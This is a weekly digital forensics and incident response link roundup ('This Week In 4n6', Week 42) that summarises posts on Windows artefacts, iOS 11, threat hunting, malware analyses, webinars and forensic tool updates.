FORENSIC ANALYSIS
- Hideaki Ihara at the Port 139 blog creates a test file on an NTFS file system to see how the $LogFile is populated.
$LogFile (1) - Adam Harrison at 1234n6 continues his investigation into the Windows subsystem for Linux. After a recent update, Adam was able to confirm that “an individual user can install multiple userlands/distributions side by side”. Installation via the Windows store results in these distros being stored within the WindowsApps folder. The associated file systems are then created within the users local appdata Packages directory. Interestingly, because the new WSL’s are Windows Store apps, “prefetch is not created or updated (unlike when launching Bash installed via the Beta method).”
Further Forensicating of Windows Subsystem for Linux - Arsenal Consulting tweeted out a comparison between last write times from the active SOFTWARE hive and the Fast Boot SOFTWARE hive in Win8/8.1/10. This shows the last write time fo time for the same keys were different (with the fast boot hive’s being later).
Check out @ArsenalArmed’s Tweet - The Blackbag Training Team has taken a look at the iOS 11 Do Not Disturb While Driving feature. I like how they explain the feature as the user would use it before looking at the plists the devices uses to store the data.
iOS11- Do Not Disturb While Driving Analysis - The guys at CCL Group have compiled some information about the HEVC/HEIF files on iOS11 and various ways to access and convert the files for viewing.
iOS 11: HEVC and HEIF (heic) files - Jason Hale at Digital Forensics Stream has a post “focused on the new information concerning storage devices tracked in the amcache, specifically in the Root\InventoryDevicePnp key”. “The amcache doesn’t store the depth of USB device information found in the SYSTEM hive or other well-known locations, but it provides an additional data point that helps to corroborate and/or supplement data harvested from other areas.”
Amcache and USB Device Tracking - Dave at EasyMetaData has updated his FindUSBMSC script.
Update to FindUSBMSC.py for #macos #USBMSC parsing #dfir - Oleg Afonin at Elcomsoft compares iOS and Android’s security and how they affect physical data acquisition. Basically, over time the devices are getting more and more secure out of the box.
iOS vs. Android: Physical Data Extraction and Data Protection Compared - There were a couple of posts on the Forensic Focus blog this week
- They shared a paper by Frank Block and Andreas Dewald on Linux memory analysis. This report is an extended version of their DFRWS paper.
Linux Memory Forensics: Dissecting the User Space Process Heap - They (well Scar shared an article co-written by herself) also shared a paper by Oleg Skulkin & Scar de Courcier on creating a forensic image of a drive using FTK Imager and Dc3dd, and then mounting the image with Arsenal Image Mounter.
Windows Drive Acquisition
- They shared a paper by Frank Block and Andreas Dewald on Linux memory analysis. This report is an extended version of their DFRWS paper.
- Russ McRee at HolisticInfoSec has started a two-part series based on his presentation titled “DFIR Redefined: Deeper Functionality for Investigators with R”. This shows how to use R can be applied to DFIR to “interface with data via file ingestion, database connection, APIs and benefit from a wide range of packages and strong community investment”.
toolsmith #128 – DFIR Redefined: Deeper Functionality for Investigators with R – Part 1 - There were a couple of papers shared on the SANS Information Security Reading Room this week
- They shared a whitepaper by Matt Bromiley on “the power of network forensics and why it should be incorporated into all incident response investigations.”
Enhance Your Investigations with Network Data - They also shared Gabriel Sanchez’s Gold certification paper on illustrating MITM attacks on an ICS protocol using Wireshark.
Man-In-The-Middle Attack Against Modbus TCP Illustrated with Wireshark
- They shared a whitepaper by Matt Bromiley on “the power of network forensics and why it should be incorporated into all incident response investigations.”
- Andrea Fortuna at ‘So Long, and Thanks for All the Fish” has written a few posts this week
- The first post provides some details on the amcache and shimcache on Windows systems.
Amcache and Shimcache in forensic analysis - The second takes a look at a number of Window registry keys
Windows registry in forensic analysis - The last looks at Windows Event logs and provides some useful event ids for forensics.
Windows event logs in forensic analysis
- The first post provides some details on the amcache and shimcache on Windows systems.
- Over on my ThinkDFIR site, I wrote an article about one of the documents that I create to assist my analysis jobs. This is an examination report document that I write as a sort of stream-of-consciousness for me to digest at a later stage (ie before Court) and quickly get back up to speed with the job and my findings/thinking at the time of my examination.
Documenting My Work - Troy Schnack has started a new blog and for his inaugural post has written up about the “Hide It Pro” Android app. This is an app that hides data for the user and has the ability to encrypt files. I’ve had a look at a few of these apps and this is one of the only ones I’ve seen that legitimately encrypts the files it says it will (I’ve seen other apps that say they do, but they just change the filename). If the app is deleted and you don’t have the passcode you’d have to pull the APK code, find the decryption algorithm, and write your own brute-forcer.
Hide It Pro App Forensics – Android
THREAT HUNTING
- Mari Degrazia at ‘Another Forensics Blog’ has started a short series on malicious Powershell scripts. This post covers hunting for malicious PowerShell artefacts and decoding obfuscated scripts. Mari walks through a few examples where she locates obfuscated PowerShell artefacts and then is able to recover some useful IoCs.
Finding and Decoding Malicious PowerShell Scripts - Adam Orton at Countercept provides “a short analysis of the various layers and components of [WSF payloads both on client networks and uploaded to open-source malware repositories that are obfuscated using the “MegaCrypter”] that need to be decoded”. Adam also provides a YARA rule and decoder script.
Why Megacrypter is a ‘megafail’ - Digital Forensics Corp shared a couple of articles this week
- They shared an article by Greg Cottingham at Microsoft “about an attack which used PowerShell to run malicious code and collect user credentials”
How Azure Security Center unveils suspicious PowerShell attack - They also shared a post by Carlos Perez at Dark Operator on WMI event log tracking using sysmon 6.1
WMI log analysis
- They shared an article by Greg Cottingham at Microsoft “about an attack which used PowerShell to run malicious code and collect user credentials”
- Giovanni Vigna at Lastline shares his thoughts on breach detection systems and threat hunting.
From Trapping to Hunting: Intelligently Analyzing Anomalies to Detect Network Compromises - Nina Smith and Ramnath Venugopalan at McAfee Labs share the findings from a recent study of “more than 700 IT and security professionals around the world to better understand how threat hunting is used in organizations and how they hope to enhance their threat hunting capabilities.” They also list six core logs that top-tier SOCs use to identify attacks.
Tips for Effective Threat Hunting - There were a couple of posts on the SANS Internet Storm Centre this week
- Renato Marinho explains how Morphus Labs’ new tool, distinct, was used to automate the hunt for “a breach [that] may have occurred in one or more of ~500 web servers of a big company on a given date range, even though there was no evidence of leaked data or any other IOC to guide the investigation.”
Baselining Servers to Detect Outliers, (Wed, Oct 18th) - Basil Alawi S.Taher shows how to use the Yarascan Volatility plugin.
Using Yara rules with Volatility , (Fri, Oct 20th)
- Renato Marinho explains how Morphus Labs’ new tool, distinct, was used to automate the hunt for “a breach [that] may have occurred in one or more of ~500 web servers of a big company on a given date range, even though there was no evidence of leaked data or any other IOC to guide the investigation.”
- Pablo Delgado at Syspanda shares a script “that was created to check on the health for Logstash and Elasticsearch nodes”. “This is very helpful if you aren’t running x-pack, or if you aren’t using other 3rd party tool to check the health status of your ELK nodes.”
Logstash Master Script for ELK - US-CERT has released some details on a “multi-stage intrusion campaign by threat actors targeting low security and small networks to gain access and move laterally to networks of major, high value asset owners within the energy sector”
Alert (TA17-293A) Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors
UPCOMING WEBINARS
- AccessData will be hosting a number of webinars based on some of their “most popular hits of the recent past”.
By Popular Demand – Live Training Webinars! - Brett Shavers hosted a webinar during the week, which apparently had audio issues; as a result, he’s going to keep doing them. The downside is that they are limited to 50 attendees, and “the sessions will not remain online past the dates presented as recordings. These are one-time training sessions not to be repeated.” Information about the next case study can be found here
Drop the mic…please. - Katana Forensics will be hosting a webinar on their new Lantern Triage product on Nov 1st at 1pm ET
Please register for ‘ Lantern Triage Webinar’ - Jessica Hyde at Magnet Forensics will be hosting a webinar on how IoT devices will impact forensics on November 13th @ 1:00PM EDT.
Making IoT Relevant - Magnet Forensics will be hosting two webinars on Atlas, the case management tool that they recently purchased. These webinars will take place Tuesday, November 7th @ 9:00AM EDT and Wednesday, November 8th @ 1:00PM EDT
From Intake to Court: Using Case Management to Stay on Track
PRESENTATIONS/PODCASTS
- Kevin DeLong at Avairy Solutions interviewed Sean Morrissey from Katana Forensics. Sean covered the challenges in mobile forensics relating to the Apple Watch, their new triage product for mobile devices, as well as some of the updates to iOS 11 surrounding passcode/touchID unlocking.
HTCIA 2017 – Sean Morrissey - Kevin also interviewed Brian Carrier from Basis Technology about what’s happening with Autopsy/TSK/CyberTriage.
HTCIA 2017 – Brian Carrier - Ben Hughes shared the slides from his DevSecCon workshop on “MacOS security, hardening and forensics 101”
Check out @benjammingh’s Tweet - A number of playlists relating to DEF CON 25 were updated during the week
- There was another Forensic Lunch this week, live from OSDFCon. Dave and Matthew hosted Brian Carrier, Mark Mckinnon, Brian Moran, Jessica Hyde, and Brian Baskin. Brian C spoke about his presentation on the new Autopsy/SleuthKit features and things that they’re working on. Brian B briefly spoke about his work in the Flare-on challenge and recommendation for people getting into the industry to do CTFs, write code, and write blog posts. Lastly, Brian M and Jessica spoke about their work on Amazon’s hardware and cloud acquisition, as well as a quick mention of our team for the DFRWS IoT Challenge!
Forensic Lunch 10/17/17 - On this week’s Digital Forensics Survival Podcast, Michael interviewed a practitioner about why he chose to undertake a masters degree in DFIR.
DFSP # 087 – DFIR Degrees - SANS shared a few presentations from the 2017 DFIR Summit and Threat Hunting Summit.
- ShimCache and AmCache enterprise-wide hunting – SANS Threat Hunting Summit 2017
- Scaling Forensics Isn’t Magic – SANS Digital Forensics & Incident Response Summit 2017
- Processing PCI Track Data with CDPO – SANS Digital Forensics & Incident Response Summit 2017
- So Many Ducks, So Little Time – SANS Threat Hunting Summit 2017
- Forensic 4cast Awards – SANS Digital Forensics & Incident Response Summit 2017
- “Chris Sistrunk of Mandiant shows tools and tips on the very new field of DFIR for PLC’s, RTU’s and other embedded devices.”
Digital Forensics and Incident Response (DFIR) for ICS Embedded Devices
MALWARE
- Sergei Shevchenko, Hirman Muhammad bin Abu Bakar, and James Wong at BAE Systems analyse an attack perpetrated against the Taiwanese “Far Eastern International Bank (FEIB)” and the malware that has been used.
Taiwan Heist: Lazarus Tools and Ransomware - Alexandre Borges at Blackstorm Security has released a whitepaper walking through analysis of a typical banking trojan
Overview about a typical banking trojan - CERT Poland analyse the Tofsee malware.
A deeper look at Tofsee modules - Sebastian Eschweiler at Crowd Strike describes the approach used “to collect more keystream bytes, which eventually leads to decrypt the complete disk” of a disk encrypted with NotPetya.
Full Decryption of Systems Encrypted by Petya/NotPetya - Arsh Arora guest posts on the ‘CyberCrime & Doing Time’ blog analysing the TrickBot malware and it’s new ability to send spam.
TrickBot’s New Magic Trick: Sending Spam - The Cylance Threat Guidance Team analysed “a surreptitious and sophisticated remote access trojan (RAT) that had been planted and operated by the suspected threat actor” and shared many similarities with the “Hacker’s Door” backdoor.
Threat Spotlight: Opening Hacker’s Door - Bill Finlayson and Jared Day at Endgame “dive into the underlying code [of the DDEAUTO bug to] better understand what the application was capable of with DDE, and what limitations an attacker may encounter when attempting to leverage this issue.”
The Bug or Feature Debate is Back Yet Again: DDEAUTO Root Cause Analysis - Furoner examines a maldoc that abuses DDE.
Macroless DOC malware that avoids detection with Yara rule - John Ferrell at Huntress Labs walks through the analysis of a suspicious DLL
Uncovering the Payload - There were a couple of posts on the Malwarebytes Labs blog this week
- Hasherezade analyses the Magniber ransomware
Magniber ransomware: exclusively for South Koreans - Thomas Reed takes a look at the OS X Proton malware that was distributed via a supply chain attack of the Elmedia player app.
Mac malware OSX.Proton strikes again
- Hasherezade analyses the Magniber ransomware
- There were a number of posts on the SANS Internet Storm Centre this week
- Didier Stevens compares “2 seemingly identical µTorrent executables, with valid digital signatures, but different cryptographic hashes”
It’s in the signature., (Sun, Oct 15th) - Didier also shows how to examine an MSG file using oledump
Peeking into .msg files, (Sun, Oct 15th) - Brad Duncan examines some malspam that is pushing Hancitor.
Hancitor malspam uses DDE attack, (Tue, Oct 17th) - Brad also takes a look at some “malspam from the Necurs Botnet pushing Locky ransomware using Word documents as their attachments”.
Necurs Botnet malspam pushes Locky using DDE attack, (Thu, Oct 19th) - Lastly, Brad examines some “HSBC-themed malspam using [ISO files as email attachments] to distribute Loki Bot”.
HSBC-themed malspam uses ISO attachments to push Loki Bot malware, (Thu, Oct 19th)
- Didier Stevens compares “2 seemingly identical µTorrent executables, with valid digital signatures, but different cryptographic hashes”
- There were a couple of posts on Securelist this week
- Konstantin Zykov provides some information about the CutletMaker ATM malware.
ATM malware is being sold on Darknet market - The GReAT team analyse an attack that has been tied to the BlackOasis APT.
BlackOasis APT and new targeted attacks leveraging zero-day exploit
- Konstantin Zykov provides some information about the CutletMaker ATM malware.
- Dr. Fahim Abbasi, Nicholas Ramos, Rodel Mendrez and Gerald Carsula at Trustwave SpiderLabs examine an attack where malicious actors are “spamming out similar Microsoft Sharepoint URLs [to their previous blog post] that link to fake Australian power and telco bills infected with malware.”
Fake Power and Broadband Utility Bills serve Banking Trojans to Aussies - Muhammad Umair, Zain Gardezi , Shahzad Ahmad at FireEye examine Magniber malware that the the Magnitude EK is distributing.
Magniber Ransomware Wants to Infect Only the Right People - There were a couple of posts on the TrendLabs blog this week
- Joseph C Chen examines the Magniber Ransomware distributed by the Magnitude EK
Magnitude Exploit Kit Now Targeting South Korea With Magniber Ransomware - John Anthony Bañes takes a look at a few tricks that maldoc authors use.
New Malicious Macro Evasion Tactics Exposed in URSNIF Spam Mail
- Joseph C Chen examines the Magniber Ransomware distributed by the Magnitude EK
- Felix Seele at VMRay examines a ransomware sample that uses DDE in a Word document.
DDE Ransomware in a Macro-less Word Document - The guys at We Live Security have examined the OSX/Proton backdoor, which has been delivered via a supply chain attack.
OSX/Proton spreading again through supply-chain attack
MISCELLANEOUS
- Carrie Roberts has a guest post on the Black Hills Information Security blog about different output encoding. By default PowerShell outputs to UTF-16, which can cause unexpected GREP results; therefore it’s suggested to convert the UTF-16 output to UTF-8 using “iconv”.
Grepping Through PowerView Output - The Blackbag Training Team provide a brief overview of Lace, Project VIC, and C4All.
Fighting Back. Data Model Exports From Blacklight – LACE, Project VIC, and C4All - Extreme Coders provide a writeup of the Flare-On 2017 challenge
Flare-On Challenge 2017 Writeup - Samuel Alonso at Cyber IR has provided a review of Scott J Robert and Rebekah Brown’s “Intelligence-Driven Incident Response” and describes it as “the best book available today in the subject.”
Intelligence-Driven Incident Response, book review. - Apparently, the current X-Ways & Forensic Explorer Betas open AFF4 images natively now, although I haven’t seen anything online about this outside of this tweet. Either way, exciting news.
Check out @wirespeed4n6’s Tweet - There were a couple of posts of interest on Forensic Focus this week
- They shared a round-up of forum posts that have inspired discussion
Forensic Focus Forum Round-Up - They also shared a few news articles they found interesting over the last month
Digital Forensics News October 2017
- They shared a round-up of forum posts that have inspired discussion
- Adam at Hexacorn shows that it may be possible to execute a DLL using the handwriting section of the Windows on-screen keyboard.
Beyond good ol’ Run key, Part 67 - Magnet Forensics have released their whitepaper on presenting digital evidence at Court.
White Paper: 12 Tips for Presenting Digital Evidence in Court - Mark Mckinnon provides an update on the Autopsy plugin competition results. Of the 14 entries Mark submitted 12 (really stacking the deck in his favour, but hey it works). He has also created an installer for all of his plugins to make them easier to obtain. Mark asks for feedback about where people would like to see his work on Autopsy modules head in the future.
The Conclusion To The Road To OSDFCon - SANS have shared the new DFIR course-specific challenge coins. I really need to put the work in to get one of those lethal forensicator coins…I think those are my favourite still.
“Coin Check: Win the challenge, join the elite list of lethal forensicators & take home a brand new DFIR challenge coin!”
SOFTWARE UPDATES
- Didier Stevens has updated oledump to version 0.0.29, adding “support to decode strings like UNICODE strings (-t), and can dump strings (-S)”
Update: oledump.py Version 0.0.29 - Didier also updated base64dump.py to version 0.0.8 adding “support to decode strings like UNICODE strings.”
Update: base64dump.py Version 0.0.8 - Digital Detective updated NetAnalysis to v2.7 and HstEx to v4.7. “This version of NetAnalysis® introduces support for a number of new browsers as well as adding support for the latest release versions of existing browsers which are already supported. “. “This release of HstEx® adds the ability to recover a number of new artefacts as well as adding support for three new browsers. We have also made a number of changes to support the updates released by the browsers already supported.”
NetAnalysis® v2.7 and HstEx® v4.7 Released - Phil Harvey has updated ExifTool to version 10.64 (development release), adding new tags and fixing some bugs.
ExifTool 10.64 - Sarah Edwards at Mac4n6 updated her Mac MRU Parser to version 1.3 to support the new .sfl2 MRU files.
Script Update – Mac MRU Parser v1.3 – New 10.13 *.sfl2 MRU Files - Magnet Forensics updated Axiom to version 1.2.1, adding support for iOS11 and Android Oreo, as well as other improvements.
Magnet AXIOM 1.2.1 Supports iOS 11 and Brings Other Enhancements - Microsystemation has released XEC v2.0 and Kiosk and Tablet v7.5. XEC adds a “Tailored personalization for each export type in the updated GUI [and a]
new option to archive the output into one or more .zip files”. “Kiosk and Tablet v7.5 can now be networked”
New XEC v2.0 now available: XEC Director, Export & Express and MSAB Kiosk v7.5 - Passmark updated OSForensics to version V5.2.1001 with some bug fixes and updates to the triage wizard.
V5.2.1001 – 18th of October 2017 - Stroz Friedberg released plistutils; a library that provides a “number of convenience functions for dealing with Apple Property List files” with the goal of providing “a single, comprehensive Python library for dealing with all aspects of Plist parsing.”
plistutils - Both the version 4.5.0 of the Sleuth Kit and Autopsy were released during the week with some new features and bug fixes. The correlations database in Autopsy is interesting – it stores artefacts in a separate database so that you can identify connections between different cases.
- “A new download of v8.5.3 of the viewer component is now available. It includes one security fix, apparently to protect the software against malformed TIFF files (just a guess, did not find an official description). The update is probably recommendable.”
X-Ways Viewer Component
And that’s all for Week 42! If you think I’ve missed something, or want me to cover something specifically hit me up through the contact page or on the social pipes!
This Week In 4n6 